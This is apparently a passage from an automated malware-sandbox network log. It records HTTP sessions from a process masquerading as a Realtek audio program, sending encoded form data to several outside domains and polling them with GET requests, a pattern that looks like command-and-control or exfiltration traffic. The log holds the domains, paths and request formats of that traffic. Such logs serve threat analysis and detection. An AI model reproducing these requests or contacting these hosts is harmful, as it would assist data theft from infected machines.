                                                                                        39192.168.11.2049754198.2.236.225807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:39.468727112 CET1289OUTPOST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 45 72 39 6a 59 65 70 35 7a 69 4c 61 6a 39 35 30 74 68 45 4f 58 41 42 42 31 46 2b 44 76 5a 31 76 2f 58 79 33 31 2b 74 54 67 6f 61 62 42 59 30 6b 36 68 46 41 73 4d 78 62 5a 6c 6c 6a 79 30 56 36 6f 44 6b 47 54 33 5a 45 52 4b 59 63 75 35 62 63 71 6a 62 37 30 4c 4c 4f 75 33 6d 62 37 5a 6a 52 59 33 55 6d 79 79 5a 37 48 69 69 79 66 75 59 74 55 4d 53 77 4f 36 6a 74 4c 75 42 51 4e 35 46 62 55 2b 72 42 79 35 35 37 64 62 51 4c 7a 47 33 6a 32 4f 6d 34 4f 51 37 33 75 6c 75 6a 56 7a 48 4c 56 31 6c 47 32 46 63 4c 31 47 31 39 56 5a 57 44 56 67 50 2f 6e 43 36 30 73 70 69 67 44 39 78 31 79 39 54 51 75 69 75 49 37 4e 69 72 6a 31 37 77 36 6c 7a 6e 58 77 51 61 4c 33 4c 70 47 71 73 64 33 42 51 31 6f 30 6c 67 69 48 33 36 6f 36 35 44 32 4f 66 6e 68 35 4c 55 47 6e 47 45 77 4e 74 64 62 4f 41 53 47 55 6b 36 79 6a 50 6d 62 47 75 42 46 75 4d 76 64 34 76 33 7a 54 57 56 2f 71 56 6c 57 76 30 64 58 74 69 67 6b 64 4b 7a 77 78 59 45 4a 57 4a 77 45 46 36 70 6b 73 68 56 48 6d 77 58 6b 59 50 33 74 73 57 6b 65 45 71 61 37 38 52 [TRUNCATED]
                                                                                        Data Ascii: Sb=Er9jYep5ziLaj950thEOXABB1F+DvZ1v/Xy31+tTgoabBY0k6hFAsMxbZlljy0V6oDkGT3ZERKYcu5bcqjb70LLOu3mb7ZjRY3UmyyZ7HiiyfuYtUMSwO6jtLuBQN5FbU+rBy557dbQLzG3j2Om4OQ73ulujVzHLV1lG2FcL1G19VZWDVgP/nC60spigD9x1y9TQuiuI7Nirj17w6lznXwQaL3LpGqsd3BQ1o0lgiH36o65D2Ofnh5LUGnGEwNtdbOASGUk6yjPmbGuBFuMvd4v3zTWV/qVlWv0dXtigkdKzwxYEJWJwEF6pkshVHmwXkYP3tsWkeEqa78RJJezDeoYwT+zG9qhN65yTFJfFljHR304lblQVvn9D0Ry5YfJcIm3l7nXMmaLJ/NwO3/Ejj2YsB/v/TUHVfTNiteJ/W/XRcwQSW7bv4BdoGyRJngkZcaVWshD4+rJc7IjhvCtlRkBFLd/4ubzsnDGzxD2vJzJmQTzpxOCben6qsBebbEXUQCZ79az0+7cRuNggitG1YtmEwtbrSM2sFB3NohSMiVFZvWp7TKH0JTro0lMmxzEUVw6kvP2O9iqk9zGZfxpxFha4IGzRrY9B+pYUroxVNxtq8HDZ/jnegppwexdK4UFcn6Ri6RSwbR/6adEwgDBfK8X4wDQ18fz5/N08Tyu1od2wfFTqJpBn1tHo6KbyCbhW48zqUroFbK9lpRpx4h6FkJTOH0kGaOASX5SgArlW6TmmR4vis9EpN8nThyMuqhtSGgPhUsep5Qn7TsgMuSbEIYUIaIKurHedXu3hYd4KtqvKVPtjUFzhkQWJptGcCx7kxN
                                                                                        Dec 12, 2024 21:56:39.468775034 CET1289OUTData Raw: 33 2b 52 72 54 75 5a 63 68 37 76 63 58 71 41 5a 56 58 79 37 64 5a 48 4a 64 63 32 7a 2b 2f 32 69 70 2b 6f 50 4d 78 4f 35 69 30 4c 55 78 57 77 71 61 4b 6d 73 41 72 39 76 49 41 62 2b 65 6f 4a 74 62 33 30 6b 30 56 53 4c 4b 74 30 4a 66 47 4e 68 51 65
                                                                                        Data Ascii: 3+RrTuZch7vcXqAZVXy7dZHJdc2z+/2ip+oPMxO5i0LUxWwqaKmsAr9vIAb+eoJtb30k0VSLKt0JfGNhQeIZi6lDppa8SyqvXNxwAaHecVZfv3AkaAgVAPtPrQArIV3muUmBWYbEVAWHDm9aEWaNPLrLlDURv8VFhgw1uX9sv4wkhgwy2uK75ZrGQP1+CFytcq5bKjsrMPiVCObzN7QYZBxaNARb8kDJU/rL7024ejqLnIdKNdC
                                                                                        Dec 12, 2024 21:56:39.468826056 CET5241OUTData Raw: 4f 31 69 4b 77 4d 4b 34 47 74 50 34 65 63 66 64 65 39 56 65 61 6c 70 45 64 41 31 57 4f 4a 76 59 35 72 6b 58 6d 4e 66 45 75 44 68 73 69 54 62 38 47 66 6d 77 4b 58 34 31 47 63 30 7a 73 65 66 76 72 4a 34 39 7a 48 47 72 79 55 50 4b 50 49 45 41 79 73
                                                                                        Data Ascii: O1iKwMK4GtP4ecfde9VealpEdA1WOJvY5rkXmNfEuDhsiTb8GfmwKX41Gc0zsefvrJ49zHGryUPKPIEAysy7xniPhIRMAjTrbEb64WD7N3m48v/qGz95Pkj4PHdKdqfzYVtpebAgjC8T19xthK6A3+B+KrGWU/0r+xD/IdyyjeA4ZTiwE59pkruA98dgYQxz2gvGwdAipPdI3qnG8Xvt1lgMs3fEtb7h+MobIZpO+q08lUpJeuI
                                                                                        Dec 12, 2024 21:56:39.637723923 CET146INHTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:39 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.11.2049755198.2.236.225807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:42.167582035 CET384OUTGET /f7zl/?Sb=JpVDbrUZlDTgo68GijwbXUpM20WTl/lO5ke29OZx5ZiPNIs3iQFHoOZPOWsCnUoFoD4OWghDdoQd24qIggPhoo7R/zvFzJ3VTGAfqCgLISGEH/s3DM2hN/E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:42.337433100 CET146INHTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:41 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.11.2049756142.171.82.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:47.676862955 CET650OUTPOST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 51 4f 6f 77 39 72 54 62 31 6d 2b 42 33 30 36 6c 63 55 7a 30 66 68 55 2b 79 52 6e 52 4d 63 34 62 59 71 59 47 63 4c 55 33 63 50 75 49 71 33 69 63 4c 6c 77 61 59 66 41 61 56 66 53 45 61 51 50 38 75 77 70 46 31 37 57 73 6b 52 68 56 57 2b 5a 68 61 67 5a 69 4b 48 72 6e 76 65 6e 54 72 53 79 48 38 39 41 52 4d 6c 78 58 2f 63 48 67 6e 65 4a 71 34 73 32 51 46 38 6b 38 66 50 59 68 69 59 54 70 75 77 4e 61 4d 51 31 39 4d 42 2b 79 4b 38 44 41 6d 6d 46 48 6a 30 32 4d 5a 31 32 53 66 31 67 6a 44 61 56 61 41 76 49 55 71 2b 4a 63 2f 38 75 74 64 6a 59 6a 57 74 38 53 49 43 56 58 37 4d 7a 75 49 51 3d 3d
                                                                                        Data Ascii: Sb=QOow9rTb1m+B306lcUz0fhU+yRnRMc4bYqYGcLU3cPuIq3icLlwaYfAaVfSEaQP8uwpF17WskRhVW+ZhagZiKHrnvenTrSyH89ARMlxX/cHgneJq4s2QF8k8fPYhiYTpuwNaMQ19MB+yK8DAmmFHj02MZ12Sf1gjDaVaAvIUq+Jc/8utdjYjWt8SICVX7MzuIQ==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.11.2049757142.171.82.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:50.366075993 CET670OUTPOST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 51 4f 6f 77 39 72 54 62 31 6d 2b 42 30 52 71 6c 50 48 62 30 5a 42 55 39 2b 78 6e 52 47 38 34 66 59 71 55 47 63 4b 68 71 64 38 4b 49 72 57 53 63 4b 6d 6f 61 52 50 41 61 65 2f 53 42 58 77 50 31 75 77 6c 4e 31 35 53 73 6b 52 31 56 57 37 64 68 5a 52 5a 6a 46 33 72 6c 36 4f 6e 52 6b 79 79 48 38 39 41 52 4d 6c 31 35 2f 63 50 67 6e 76 5a 71 35 4e 32 58 62 4d 6b 7a 59 50 59 68 7a 6f 54 74 75 77 4e 6b 4d 56 73 31 4d 45 79 79 4b 39 7a 41 6e 30 39 41 70 30 33 6d 64 31 32 47 5a 57 46 48 45 61 78 46 42 2f 59 4f 79 65 42 6e 7a 4b 6a 33 41 52 73 48 56 2b 67 67 4d 79 73 2f 35 4f 79 31 56 55 50 4a 67 65 4d 4d 45 41 79 46 76 4a 4e 41 79 68 67 5a 7a 2b 41 3d
                                                                                        Data Ascii: Sb=QOow9rTb1m+B0RqlPHb0ZBU9+xnRG84fYqUGcKhqd8KIrWScKmoaRPAae/SBXwP1uwlN15SskR1VW7dhZRZjF3rl6OnRkyyH89ARMl15/cPgnvZq5N2XbMkzYPYhzoTtuwNkMVs1MEyyK9zAn09Ap03md12GZWFHEaxFB/YOyeBnzKj3ARsHV+ggMys/5Oy1VUPJgeMMEAyFvJNAyhgZz+A=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.11.2049758142.171.82.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:53.049279928 CET1289OUTPOST /ivn4/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        Origin: http://www.augier2619.top
                                                                                        Referer: http://www.augier2619.top/ivn4/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 51 4f 6f 77 39 72 54 62 31 6d 2b 42 30 52 71 6c 50 48 62 30 5a 42 55 39 2b 78 6e 52 47 38 34 66 59 71 55 47 63 4b 68 71 64 38 43 49 72 6b 61 63 4c 47 55 61 44 66 41 61 54 66 53 41 58 77 4f 6c 75 77 39 4a 31 35 4f 53 6b 58 35 56 57 64 68 68 53 44 78 6a 53 48 72 6c 34 4f 6e 53 72 53 79 6f 38 39 77 56 4d 6c 46 35 2f 63 50 67 6e 74 78 71 2b 63 32 58 5a 4d 6b 38 66 50 59 6c 69 59 54 46 75 77 45 66 4d 55 59 6c 4d 77 4f 79 4b 64 6a 41 67 48 46 41 7a 30 32 41 52 56 33 42 5a 57 35 59 45 61 39 7a 42 2f 73 30 79 66 4a 6e 6c 73 32 71 53 46 34 4b 43 2b 6b 62 49 41 30 70 78 73 79 48 66 6e 62 44 6f 59 41 46 46 77 7a 51 6e 2f 4d 4d 70 53 73 53 74 4a 71 73 4d 43 58 73 75 35 67 71 6e 37 45 33 79 38 35 6f 74 42 64 6b 76 66 43 63 7a 51 50 44 37 55 75 63 4e 33 56 31 34 4d 4e 53 76 70 64 76 43 55 4e 6f 41 64 37 6b 52 2b 65 74 79 57 2f 72 72 37 51 37 4d 79 5a 39 59 31 48 43 66 41 56 4e 75 6a 79 48 30 6a 67 32 35 33 58 53 4c 35 6d 37 78 50 6a 37 61 75 74 56 31 36 73 41 66 62 78 37 46 4f 55 4e 33 63 2b 64 4e 66 4f [TRUNCATED]
                                                                                        Data Ascii: Sb=QOow9rTb1m+B0RqlPHb0ZBU9+xnRG84fYqUGcKhqd8CIrkacLGUaDfAaTfSAXwOluw9J15OSkX5VWdhhSDxjSHrl4OnSrSyo89wVMlF5/cPgntxq+c2XZMk8fPYliYTFuwEfMUYlMwOyKdjAgHFAz02ARV3BZW5YEa9zB/s0yfJnls2qSF4KC+kbIA0pxsyHfnbDoYAFFwzQn/MMpSsStJqsMCXsu5gqn7E3y85otBdkvfCczQPD7UucN3V14MNSvpdvCUNoAd7kR+etyW/rr7Q7MyZ9Y1HCfAVNujyH0jg253XSL5m7xPj7autV16sAfbx7FOUN3c+dNfOgPGY2iu50AOVbF6zM4k7T1xSFnFRRPragR0lXvfyiJqI/diE5g+lxP+QpOpaJcNPY9fbuGSgYeeDJyyLXMc5Jhp27q4L2Z6yK4HvP8Pe3TJDTFrgey1ZD8Og74F0DUuBSzPfpnYduLKa9K+SWQAR9H1lAnqDmJNxHSVcGXtSdRR80D+uGi35E2uu0cDfFKDHTmHGC+g6fw7tpoqFZ9hBEnYotLffx0dAtnb9WiN8V3coA64X/8gliYJimYlgf/jn7uA2rpOxUhRELflIW/+gAXQLAtstbWy8O9kYkW3zzXODPwix8pg/z1lClkgxlvp8v+ASZt/CHwgA8klL6EhvqQJ4wzkgPHjev59JXRsdnBqtT4+x4ComboCIpviOkEeaxP0uDTUWTSFKU4hgweqyMwhFqYQulxhNtOJhDq3Ygj7PiJRMH/vQi+ciF45R+dovSb4yzbMV6Hg/rzjHmkzeu1eIx7VFWWgyKBaTx+80Rfn6SQifztY
                                                                                        Dec 12, 2024 21:56:53.049329042 CET5156OUTData Raw: 67 76 64 72 2b 45 55 41 4f 4c 6b 6a 63 71 56 4e 49 70 57 63 54 42 44 4c 43 67 2f 36 4c 49 72 49 41 34 54 6a 4d 6d 59 47 41 56 45 56 38 4b 73 66 41 64 39 38 51 62 73 61 61 4c 71 4a 63 69 43 5a 4a 53 4d 4d 4a 7a 56 4c 63 67 6f 46 63 4d 6c 36 4a 77
                                                                                        Data Ascii: gvdr+EUAOLkjcqVNIpWcTBDLCg/6LIrIA4TjMmYGAVEV8KsfAd98QbsaaLqJciCZJSMMJzVLcgoFcMl6JwKgntp1Es+jZ+JtFGWP005p60z8bPUw9Q4gkSH+5B1Ncb6nezKnqn5p6gKJKFBkcO0OVzSWY6hS10SljCBEf+xqFBKhxvCdBbzkaV0+PkwXB7Vf2lC7eMGwFXRWFyC1oHRzXzNpSbBPaYKrykrs+lHYh2QYKM/zap/
                                                                                        Dec 12, 2024 21:56:53.049376965 CET1374OUTData Raw: 72 48 77 63 39 51 71 38 36 33 7a 6f 35 78 34 58 2f 6b 45 73 32 52 45 55 56 36 31 30 55 6f 30 61 39 31 4d 65 72 52 54 56 45 57 50 73 71 52 39 38 71 45 65 49 58 74 37 47 31 4c 31 76 78 6f 55 2f 41 77 72 2f 6b 2f 78 4a 4c 74 53 4e 51 6b 71 6b 37 38
                                                                                        Data Ascii: rHwc9Qq863zo5x4X/kEs2REUV610Uo0a91MerRTVEWPsqR98qEeIXt7G1L1vxoU/Awr/k/xJLtSNQkqk78b7vW2/KyqDE7FppGNMmnDDVeK4crQ0HLqchiBtjWkIWzjTMkGna3BZxnnLuifkWE7OnapnN0RNqPxAY915t5Yyq0ff8/HvGrbxmGFoRC0iP8ueYxNfQfnUamcTot6c26p3Uy3e0XWbJjAbAXh8vnjv2HeU2SLo4Rq


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.11.2049759142.171.82.112807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:55.738823891 CET384OUTGET /ivn4/?Hsa=KVXAK1dJ22EyzD&Sb=dMAQ+cXbzFKaj3/VQV3ARRE/+V/pDaMde5ltK60scu7oomHWLUNrXeVoeNmDAD713TgV67ncuzdzcshVShA4O3nj+t7UnCG15p0qDWw9jP76vMR/2Muxc8U= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.augier2619.top
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.11.204976015.197.148.33807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:01.200845957 CET674OUTPOST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 57 4e 53 45 36 50 53 59 79 35 45 36 4f 56 61 30 6d 2b 41 70 66 36 67 55 75 53 55 62 30 64 52 45 37 57 65 4e 64 31 41 2f 44 4b 4e 79 6d 63 68 6a 49 65 37 4e 66 7a 6a 51 74 6d 56 37 6e 48 6f 6d 33 33 76 6e 32 53 34 5a 51 54 48 77 42 6f 63 75 6f 4d 52 41 34 6e 45 54 59 41 73 53 53 4f 69 34 4a 35 54 35 39 42 58 54 34 52 6d 6a 68 73 48 74 56 49 34 68 6d 78 54 31 39 6d 6a 32 4d 62 34 65 78 33 63 51 50 41 70 55 35 75 2f 68 6e 48 6a 39 6e 77 39 46 62 6c 4a 62 54 30 46 68 4b 2b 5a 51 72 57 39 70 4c 77 64 54 77 59 77 76 63 4c 64 47 4d 46 77 30 62 74 4a 6f 46 65 53 64 38 34 4c 65 72 41 3d 3d
                                                                                        Data Ascii: Sb=WNSE6PSYy5E6OVa0m+Apf6gUuSUb0dRE7WeNd1A/DKNymchjIe7NfzjQtmV7nHom33vn2S4ZQTHwBocuoMRA4nETYAsSSOi4J5T59BXT4RmjhsHtVI4hmxT19mj2Mb4ex3cQPApU5u/hnHj9nw9FblJbT0FhK+ZQrW9pLwdTwYwvcLdGMFw0btJoFeSd84LerA==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.11.204976115.197.148.33807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:03.845204115 CET694OUTPOST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 57 4e 53 45 36 50 53 59 79 35 45 36 42 55 71 30 68 70 30 70 49 4b 67 56 72 53 55 62 6a 4e 52 49 37 58 69 4e 64 77 67 76 44 34 5a 79 68 35 64 6a 61 76 37 4e 65 7a 6a 51 6d 47 56 69 2f 6e 6f 68 33 33 72 5a 32 51 63 5a 51 54 54 77 42 73 51 75 30 76 4a 66 69 58 45 64 51 67 73 51 64 75 69 34 4a 35 54 35 39 42 79 32 34 52 2b 6a 6d 63 33 74 54 5a 34 69 73 52 54 79 30 47 6a 32 61 72 34 67 78 33 63 32 50 43 63 63 35 72 7a 68 6e 46 37 39 6e 42 39 43 41 56 4a 6e 65 55 45 45 50 64 6b 30 67 69 56 42 41 6a 78 71 70 59 55 6a 5a 64 51 63 52 33 45 51 59 2b 56 61 42 75 72 31 2b 36 4b 46 32 4c 76 57 44 76 37 44 43 2f 68 69 51 63 36 4f 51 33 76 70 6b 4e 30 3d
                                                                                        Data Ascii: Sb=WNSE6PSYy5E6BUq0hp0pIKgVrSUbjNRI7XiNdwgvD4Zyh5djav7NezjQmGVi/noh33rZ2QcZQTTwBsQu0vJfiXEdQgsQdui4J5T59By24R+jmc3tTZ4isRTy0Gj2ar4gx3c2PCcc5rzhnF79nB9CAVJneUEEPdk0giVBAjxqpYUjZdQcR3EQY+VaBur1+6KF2LvWDv7DC/hiQc6OQ3vpkN0=
                                                                                        Dec 12, 2024 21:57:04.883649111 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.11.204976215.197.148.33807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:06.486993074 CET1289OUTPOST /kr0d/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        Origin: http://www.outandaboutatlanta.net
                                                                                        Referer: http://www.outandaboutatlanta.net/kr0d/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 57 4e 53 45 36 50 53 59 79 35 45 36 42 55 71 30 68 70 30 70 49 4b 67 56 72 53 55 62 6a 4e 52 49 37 58 69 4e 64 77 67 76 44 35 68 79 6d 4c 6c 6a 49 38 6a 4e 4d 6a 6a 51 72 6d 56 2f 2f 6e 70 39 33 78 43 65 32 51 67 7a 51 51 72 77 44 4a 4d 75 34 4f 4a 66 73 6e 45 64 63 41 73 64 53 4f 69 58 4a 39 2f 39 39 42 43 32 34 52 2b 6a 6d 66 76 74 43 49 34 69 2f 42 54 31 39 6d 6a 45 4d 62 34 62 78 33 6c 4e 50 42 77 4d 35 2f 50 68 6d 6c 72 39 67 6e 68 43 4d 56 4a 68 5a 55 45 6d 50 64 6f 72 67 6d 31 4e 41 69 46 41 70 59 73 6a 55 49 70 33 46 44 52 4c 45 2b 74 4f 45 61 69 4d 32 49 47 55 70 37 7a 32 54 4d 4c 77 4b 72 42 55 54 39 32 30 4c 48 48 7a 6e 37 79 4f 6c 4d 5a 36 65 6d 37 50 65 78 64 50 37 53 70 44 30 35 71 35 67 6e 34 71 41 39 56 48 31 48 73 4c 32 39 6b 44 56 5a 49 64 6c 6b 52 43 65 5a 34 6b 45 4d 68 55 32 66 2f 50 52 30 50 35 62 52 31 39 2b 4e 54 55 68 35 57 68 73 57 37 4f 77 36 48 47 32 78 7a 69 53 6d 73 38 62 38 33 42 58 4e 57 46 6e 63 30 76 6e 71 78 33 62 66 79 41 53 6d 79 6b 36 78 6e 31 69 57 65 [TRUNCATED]
                                                                                        Data Ascii: Sb=WNSE6PSYy5E6BUq0hp0pIKgVrSUbjNRI7XiNdwgvD5hymLljI8jNMjjQrmV//np93xCe2QgzQQrwDJMu4OJfsnEdcAsdSOiXJ9/99BC24R+jmfvtCI4i/BT19mjEMb4bx3lNPBwM5/Phmlr9gnhCMVJhZUEmPdorgm1NAiFApYsjUIp3FDRLE+tOEaiM2IGUp7z2TMLwKrBUT920LHHzn7yOlMZ6em7PexdP7SpD05q5gn4qA9VH1HsL29kDVZIdlkRCeZ4kEMhU2f/PR0P5bR19+NTUh5WhsW7Ow6HG2xziSms8b83BXNWFnc0vnqx3bfyASmyk6xn1iWeaXMdt7l4TNUeVyNI/fQwGlcCRc1dmwfydUboPQj6ig1b9kXU5vKJi6AO/kaZ4zijiz9wDZ0B1mbYV3TM36PUHMKsyxCI4RuMdU8zEWKPQThsEFi8ENeMgfVqDyrcC6GvhxBE+GK55J/jQypEnjmhQWZamiqVvY6d5Dh9vhxKQ1elSahxvo4nhzYrHBvLArBKW8RzjS/RoAlkzV/VoeiL3ufB+V4uP4s75XICWyPRbKdEXhOE5ZaIH7kysLrgn/yrg3HLINZMIQX0TWKVpqiZwEZjAFE1Ir8O+aTIR/c8HMNBXX0mpch3O5lrKMSug0igtiMaY5Vi5BK2lkIWLmf/3UAOcfxo+FE9XbGLJP6hXvXJPtAiJ0/ai08r40gHZTb0nnY8umHbeH7V/ykfbvE9ir0U0TnxxWKlI27YG4U9K/qy3UtYE6oVUB7uplptHaSp+e7e1ptzvU0FWuTYAY0QSx5KTjB
                                                                                        Dec 12, 2024 21:57:06.487047911 CET6554OUTData Raw: 38 72 46 6d 77 67 2b 32 68 34 50 71 2b 35 35 69 50 43 34 4b 46 4c 48 52 75 79 44 38 7a 63 74 35 48 44 63 72 59 7a 4a 45 76 4a 42 55 65 76 77 50 43 47 36 4e 34 57 6a 69 71 42 4b 34 32 38 37 36 67 51 68 2b 61 50 66 70 45 34 38 56 47 71 52 49 5a 7a
                                                                                        Data Ascii: 8rFmwg+2h4Pq+55iPC4KFLHRuyD8zct5HDcrYzJEvJBUevwPCG6N4WjiqBK42876gQh+aPfpE48VGqRIZzmsDiNMEJ6X7YICkzxfralRt+NIyJdFPd2v1SVM/ONoKi7WRWHreDqBhLxKxJrW+//gHRwPcgWc3YEDs6z2s2/FecTTTFuOdIeX8vrWdE5G2sLTeuPaZZVNbM/IUH7wE5oyTBmQRHOlMY/64dtDUM8k0XA+3A8agGy
                                                                                        Dec 12, 2024 21:57:06.617058992 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.11.204976315.197.148.33807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:09.125288963 CET392OUTGET /kr0d/?Sb=bP6k54Oj/dVpOGyx/646OsJjlk1Lh7hM6WHpc10dBI59rbtyQ+CUKzevm31jgUF3ujuXywFddjnVFrAf6vJCnEwCXj5JR8KMKpXq1B6p4R6mvtq3C4oxnko=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.outandaboutatlanta.net
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
